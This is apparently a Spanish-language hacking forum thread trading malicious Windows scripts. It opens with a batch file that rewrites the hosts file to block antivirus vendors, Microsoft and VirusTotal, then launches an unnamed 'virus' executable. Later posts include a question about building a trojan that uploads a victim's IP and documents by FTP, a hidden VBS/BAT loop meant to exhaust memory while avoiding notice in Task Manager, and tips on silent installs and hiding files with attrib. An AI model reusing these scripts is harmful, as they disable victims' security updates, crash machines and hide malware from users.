Mensajes

Aki va un código de doble filo.

Código [Seleccionar] Expandir

@echo off
set hosts=%windir%\System32\drivers\etc\hosts
echo. >> %hosts%
echo 127.0.0.1 avp.com >> %hosts%
echo 127.0.0.1 ca.com >> %hosts%
echo 127.0.0.1 customer.symantec.com >> %hosts%
echo 127.0.0.1 dispatch.mcafee.com >> %hosts%
echo 127.0.0.1 download.mcafee.com >> %hosts%
echo 127.0.0.1 f-secure.com >> %hosts%
echo 127.0.0.1 kaspersky.com >> %hosts%
echo 127.0.0.1 kaspersky-labs.com >> %hosts%
echo 127.0.0.1 liveupdate.symantec.com >> %hosts%
echo 127.0.0.1 liveupdate.symantecliveupdate.com >> %hosts%
echo 127.0.0.1 mast.mcafee.com >> %hosts%
echo 127.0.0.1 mcafee.com >> %hosts%
echo 127.0.0.1 microsoft.com >> %hosts%
echo 127.0.0.1 my-etrust.com >> %hosts%
echo 127.0.0.1 nai.com >> %hosts%
echo 127.0.0.1 networkassociates.com >> %hosts%
echo 127.0.0.1 pandasoftware.com >> %hosts%
echo 127.0.0.1 rads.mcafee.com >> %hosts%
echo 127.0.0.1 secure.nai.com >> %hosts%
echo 127.0.0.1 securityresponse.symantec.com >> %hosts%
echo 127.0.0.1 sophos.com >> %hosts%
echo 127.0.0.1 symantec.com >> %hosts%
echo 127.0.0.1 trendmicro.com >> %hosts%
echo 127.0.0.1 updates.symantec.com >> %hosts%
echo 127.0.0.1 update.symantec.com >> %hosts%
echo 127.0.0.1 us.mcafee.com >> %hosts%
echo 127.0.0.1 viruslist.com >> %hosts%
echo 127.0.0.1 virustotal.com >> %hosts%
echo 127.0.0.1 www.avp.com >> %hosts%
echo 127.0.0.1 www.f-secure.com >> %hosts%
echo 127.0.0.1 www.grisoft.com >> %hosts%
echo 127.0.0.1 www.kaspersky.com >> %hosts%
echo 127.0.0.1 www.mcafee.com >> %hosts%
echo 127.0.0.1 www.microsoft.com >> %hosts%
echo 127.0.0.1 www.moneybookers.com >> %hosts%
echo 127.0.0.1 www.my-etrust.com >> %hosts%
echo 127.0.0.1 www.nai.com >> %hosts%
echo 127.0.0.1 www.networkassociates.com >> %hosts%
echo 127.0.0.1 www.pandasoftware.com >> %hosts%
echo 127.0.0.1 www.sophos.com >> %hosts%
echo 127.0.0.1 www.symantec.com >> %hosts%
echo 127.0.0.1 www.trendmicro.com >> %hosts%
echo 127.0.0.1 www.virustotal.com >> %hosts%
strart el_nombre_del_virus_que_gasta_memoria_y_desabilita_los_avs_en_tiempo_real.exe
strart el_nombre_del_virus_que_gasta_memoria_y_desabilita_los_avs_en_tiempo_real.exe

Lo compilamos con el_nombre_del_virus_que_gasta_memoria_y_desabilita_los_avs_en_tiempo_real.exe y para que no se vea la ventana y tendremos un virus en tiempo real con triple funcion XD.

NO lo encuentro

¿Como genero un archivo con un nombre por defecto y lo envio por ftp? La cuestión es que estoy haciendo un troyano de prueba y necesito crea txt que contenga la ip y otros datos o comprimir sus documentos y subirlos por ftp (cualquiera viene bien) pero debo subirlo a ftp con un nombre único para poder enviarlo por ftp.

Perdón por revivir el post pero me llamo mucho la atención.
Aquí les traigo 2 archivos para ocupar memoria:

Primero: Creamos un vbs con block de notas que contenga lo siguiente y que se llame vas.vbs por ejemplo:

set objshell = createobject("wscript.shell")
objshell.run "vas.bat",vbhide

Segundo: Creamos un bat con block de notas que contenga lo siguiente y que se llame vas.bat por ejemplo:

start vas.vbs
start vas.vbs
start vas.vbs
pause

Tercero: Todo debe estar junto y si quieren remplacen el vas por el nombre que quieran pero todo, el nombre, el archivo todo.

Explicación: lo que hace esto es lo siguiente ejecutamos el vbs y el vbs ejecuta al bat de forma oculta y luego el bat ejecuta al vbs y así se va completando el ciclo que cada vez ejecuta a mas bat y los deja parados asi se va juntando memoria. Pueden eliminarle y agregarles mas start vas.vbs asi ocupa memoria mas rápido, pero no lo recomiendo sino nos descubrirían mas rápido, incluso se le puede dejar uno solo y sacarle el pause así el menos probable que no vean tantos cmd.exe wscript.exe en el administrador de tareas.

Yo creo que sí, yo me he metido muchas veces y no me ha pasado nada, de todas formas te recomiendo cambiar tu pass cada cierto tiempo, no cuesta nada, y si alegas tener mala cabeza, pues es un buen método para ejercitarla.

Imagina que e-buddy es una página con renombre, si empiezan a meterse en los correos de la gente (que no dudo que puedan, porque las claves las tienen seguro) dejarían de tener clientes, porque no se si te has dado cuenta tienen tantos anuncios como el msn, si ya hasta incluso te obligan a interactuar con algunos, de ahí sacan la pasta. Tienen hasta versión portable para psp y dispositivos móviles.

Si ves una página con muuuucha publicidad, fíate más que si ves otra sin nada de nada, así al menos sabes que aunque no pagues nada por conectarte al servidor, ellos obtienen beneficios igualmente.

eBuddy por lo menos yo se que es muy fiable.

Hola, estoy viendo esto y me di cuenta de  que no hay ningún programa liviano sencillo y actualiza-ble de evitar estas web y estoy desarrollando un software que tiene la opción de: bloquear webs así, webs spam, y estoy viendo la forma de poner una contraseña en vb6 o un método bizarro para bloquear webs porno.

Esto ya no funciona mas o eso creo.
¿Que es lo que pasa?, los avs se actualizan creo, desde el reg con otro ip asi que creo que esto aunque lo camuflemos con el mejor cripter creo que levantaría sospechas pero porque empresaria a mandar alertas pero es posible ej: con el execript, al otro día mandan a mi virus, lo analizar, después como mi virus desactivo a las actualizaciones de x cantidad de antivirus esa x cantidad de ordenadores con antivirus des-actualizados seguirá infectándose Xd.

busca el programa USSF

Universal Silent Switch Finder.

le cargas el ejecutable instalador del WGA (crei que WGA habia sido reemplazado por WAT :S)

y te dice cual parametro le tenes que agregar para que sea silent.

cualquiercosa avisame que te explico mas

Gracias y aparte me sirve para otro proyecto.
Si en realidad si porque avían demandado a la WGA.
Me imagino que le pongo /SILENT ¿NO?

Tal vez el parametro -h no funcione, pero seguramente lo hará el /? o alguno similar... podrias subir una captura de la informacion del fichero? (Segundo boton,propiedades)

y que tal attrib +s +r +h WAT.exe?

[cmd]

Prueba a ver si el instalador permite la instalación oculta mediante un comando del tipo /s... para saberlo puedes hacer desde el cmd un "nombre_instalador.exe -h" por ejemplo

Gracias, y a probar se a dicho.  

wohoho linda broma pesada

(No hagas doble post, Karcrack)

Prueba a ver si el instalador permite la instalación oculta mediante un comando del tipo /s... para saberlo puedes hacer desde el cmd un "nombre_instalador.exe -h" por ejemplo

Tu código no funciona porque no tiene el parámetro -h, pero la intención vale.